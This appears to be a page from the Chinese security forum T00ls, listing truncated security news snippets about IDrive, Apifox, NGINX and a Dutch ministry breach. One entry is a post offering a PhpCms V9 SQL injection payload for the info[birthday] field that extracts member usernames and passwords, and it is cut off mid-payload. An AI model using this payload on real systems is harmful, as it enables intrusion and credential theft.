IDrive for Windows 漏洞可致攻击者提升权限
IDrive Cloud Backup Client for Windows 中发现了一个关键的本地权限提升漏洞。该漏洞被追踪为 CVE-2026-1995,影响 IDrive Cloud Backup Client for Windows,具体涉及 7.0.0.63 及更早版本。FRSecure 的安全研究人员发现,该应用程序目录内的弱权限配置可能导致系统迅速完全受损。若成功利用,该漏洞允许已认证攻击者在 ...
重大安全播报!Apifox遭遇投毒 请使用该平台的开发者立即轮换所有密钥
更新时间:2026-03-26 11:27 更新内容: 点击查看:Apifox发布安全公告承认遭到攻击,开发者/企业应当全面排查并重置敏感凭证安全研究人员日前发现 Apifox 平台遭遇投毒,黑客通过平台安全缺陷向所有开发者投放包含恶意代码的 JS 文件,恶意代码会窃取各类配置信息和敏感数据。如果开发者在 2026 年 3 月 4 日后打开过 Apif ...
荷兰财政部系统遭黑客入侵,已紧急切断访问权限,已经发布了遭受网络攻击的声明
荷兰财政部周一证实,在上周发现的一次网络攻击中,该部的一些系统遭到了破坏。官员们表示,该部在3月19日接到了第三方关于此次入侵的通知,目前仍在调查此次网络攻击。一项正在进行的调查发现,该事件影响了一些员工。一份官方声明透露:“3月19日周四,财政部的ICT安全检测到政策部门内一些主要流程的系统遭到未经授权的访 ...
利用虚假屏幕截图诱骗 Web3 支持人员感染多阶段恶意软件
一个名为 APT-Q-27 的威胁组织一直在积极攻击 Web3 客户支持团队,他们在实时聊天窗口中使用虚假屏幕截图链接,悄悄地在受害者的计算机上安装持久后门。该攻击的目标是任何组织中最具人性的部分——负责接听工单的支持人员——而不是利用软件漏洞或网络弱点。该组织也被称为 GoldenEyeDog,至少从 2022 年起就一直很活跃, ...
Apifox发布安全公告承认遭到攻击 开发者/企业应当全面排查并重置敏感凭证
昨天夜里蓝点网转发安全研究人员 @橙子酱 发布的分析报告,这篇分析报告详细说明国内知名 API 协作平台 Apifox 遭到的供应链攻击,相关恶意载荷会窃取开发者的各种敏感凭证。问题在于 Apifox 应该在 2026 年 3 月 23 日就发现被攻击并发布新版本修复漏洞,但之后该平台并未发布任何安全公告提醒开发者和企业,这是极其不负 ...
F5 NGINX Plus及开源版漏洞:攻击者可借助MP4文件执行代码
近日披露了一个影响NGINX开源版和NGINX Plus的高危漏洞。该漏洞正式编号为CVE-2026-32647,其CVSS v4.0基础评分为8.5,CVSS v3.1评分为7.8。该漏洞允许本地已认证攻击者触发拒绝服务条件,或在底层系统上潜在执行任意代码。此漏洞完全存在于应用的数据平面,因此不会暴露控制平面。F5正式确认,研究人员Xint Code与来自Aisl ...
PhpCms V9 info[birthday]注入利用
既然官方已经确认了,那就发一下所谓的EXP吧。权当交流,大家测试即可,请勿用于非法。注册后登录,找到个人资料,修改生日,拦截数据包或者直接firebug找到info[birthday],将其修改如下:[code]info[birthday=(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select concat(username,0x3a, password, 0x3a, encrypt) FROM `v9_member` WHERE 1 limit 1),1,62)))a ...
T00ls.Com版权所有。T00ls所有原创文章未经管理团队许可,禁止一切形式的转载。当前正在使用CDN加速。
Copyright © 2008 - 2026 T00ls All Rights Reserved.